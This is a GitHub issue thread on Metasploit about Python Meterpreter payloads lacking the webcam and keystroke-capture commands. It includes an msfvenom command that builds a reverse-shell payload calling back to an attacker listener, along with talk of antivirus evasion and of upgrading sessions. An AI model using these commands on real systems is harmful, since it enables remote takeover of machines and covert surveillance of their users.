### ISSUE TITLE
uknown command: webcam_list

### ISSUE THREAD

**Issue by james-88** [rapid7/metasploit-framework#9847]
I am experimenting with python payloads, unlike other payloads python ones seem to be missing some modules such as the webcam one and the keyscan.
## Steps to reproduce

`msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=1234
`
The generated output is stored in a .py file and I am running it using a python interpreter from the target computer, eveyrthing is working fine, I am getting a connection back and I am able to use all of the commands listed when I execute

`help
`
The problem is that some modules are missing like the webcam and keyscan.

### Metasploit version
4.16.39-dev

### I installed Metasploit with:
- [x] Kali package via apt

### OS

What OS are you running Metasploit on?
Kali Linux 2018.1

**Comment by wvu-r7** [comment]
They are unimplemented.

**Comment by james-88** [comment]
Thanks for the response..... Anyway around it? or are there any plans to implement them ?? its just they seem to be pretty good when it comes to modifying their code or bypassing AVs .

**Comment by timwr** [comment]
You could try spawn a native (non-python) session with `sessions -u`. The new native session might support the webcam_* commands

**Comment by wvu-r7** [comment]
No immediate plans, but someone will do it. Native is your best bet right now. What AV are you evading with Python Meterpreter? Even ClamAV will catch the stager.
